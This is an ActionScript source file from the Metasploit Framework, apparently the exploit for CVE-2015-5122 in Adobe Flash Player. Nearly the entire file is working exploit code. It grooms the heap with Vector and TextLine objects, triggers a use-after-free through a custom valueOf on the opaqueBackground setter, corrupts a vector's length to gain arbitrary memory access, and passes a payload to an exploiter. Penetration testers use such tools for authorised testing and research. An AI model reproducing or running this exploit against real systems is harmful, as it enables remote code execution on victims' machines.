metasploit-framework/external/source/exploits/CVE-2015-5122/MyClass.as

142 lines
5.1 KiB
ActionScript
Executable File

package
{
import flash.display.DisplayObjectContainer;
import flash.utils.ByteArray;
import flash.system.Capabilities;
import flash.events.MouseEvent;
import flash.external.ExternalInterface;
import flash.text.*;
import flash.text.*;
import flash.text.engine.*;
public class MyClass
{
static var
_gc:Array,
_ar:Array,
_arLen1:int,
_arLen2:int,
_arLen:int,
_vu:Vector.<uint>,
_vo:Vector.<Object>,
_tb:TextBlock,
_tl:TextLine,
_mc:MyClass,
_is64 = null,
_chrome:Boolean,
_done:Boolean,
_cnt:int,
_vLen:int,
_magic:uint = 0x123456,
LEN40:uint = 0x40000000;
static function valueOf2()
{
try
{
if (++_cnt < _arLen2) {
// recursive call for next TextLine
_ar[_cnt].opaqueBackground = _mc;
} else {
Logger.log("MyClass.valueOf2()");
// free internal objects
for(var i:int=1; i <= 5; i++)
_tb.recreateTextLine(_ar[_arLen2-i]);
// reuse freed memory
for(i=_arLen2; i < _arLen; i++)
_ar[i].length = _vLen;
}
}
catch (e:Error)
{
Logger.log("valueOf2 " + e.toString());
}
return _vLen+8;
}
static function TryExpl(e:Exploit, platform:String, os:String, payload:ByteArray)
{
try
{
// init vars
Logger.log("init vars")
_arLen1 = 10 * 3; // 10 vectors per page
_arLen2 = _arLen1 + 4 * 4; // 4 TextLine per page
_arLen = _arLen2 + 10 * 8;
_ar = new Array(_arLen);
if (!_gc) _gc = new Array();
_gc.push(_ar);
if (!_tb) {
_tb = new TextBlock(new TextElement("TextElement", new ElementFormat()));
if (!_tb) throw new Error("_tb = " + _tb);
}
_mc = new MyClass();
_vLen = 400/4-2;
// fill 400-byte holes (400 is factor of 0x320(800) opaqueBackground corruption offset)
Logger.log("fill 400-byte holes (400 is factor of 0x320(800) opaqueBackground corruption offset)")
for(var i:int; i < _arLen1; i++)
_ar[i] = new Vector.<uint>(_vLen);
// prepare Vector objects
Logger.log("prepare Vector objects")
for(i=_arLen2; i < _arLen; i++){
_ar[i] = new Vector.<uint>(8);
_ar[i][0] = i;
}
// prepare TextLines
Logger.log("prepare TextLines")
for(i=_arLen1; i < _arLen2; i++)
_ar[i] = _tb.createTextLine();
// fill 1016-byte holes (0x38c is a size of internal TextLine object)
Logger.log("fill 1016-byte holes (0x38c is a size of internal TextLine object)")
for(i=_arLen1; i < _arLen2; i++)
_ar[i].opaqueBackground = 1; // alloc 1016 bytes
// set custom valueOf() for _mc
Logger.log("set custom valueOf() for _mc")
MyClass.prototype.valueOf = valueOf2;
// here we go, call the vulnerable setter
Logger.log("here we go, call the vulnerable setter")
_cnt = _arLen2-6;
_ar[_cnt].opaqueBackground = _mc;
// find corrupted vector length
Logger.log("find corrupted vector length ")
for(i=_arLen2; i < _arLen; i++) {
_vu = _ar[i];
if (_vu.length > _vLen+2) {
Logger.log("ar["+i.toString()+"].length = " + _vu.length.toString(16));
Logger.log("ar["+i.toString()+"]["+_vLen.toString(16)+"] = " + _vu[_vLen].toString(16));
if (_vu[_vLen] == _vLen) {
// corrupt next vector
_vu[_vLen] = LEN40;
// get corrupted vector
_vu = _ar[_vu[_vLen+2]];
break;
}
};// else CheckCorrupted(_vu, i); // 4RnD
}
// check results
Logger.log("v.length = " + _vu.length.toString(16));
if (_vu.length < LEN40) throw new Error("try again");
var exploiter:Exploiter = new Exploiter(e, platform, os, payload, _vu, 0x62)
// clean up
Logger.log("_vu.length = " + _vu.length.toString(16));
}
catch (e:Error)
{
Logger.log("TryExpl " + e.toString());
}
}
}
}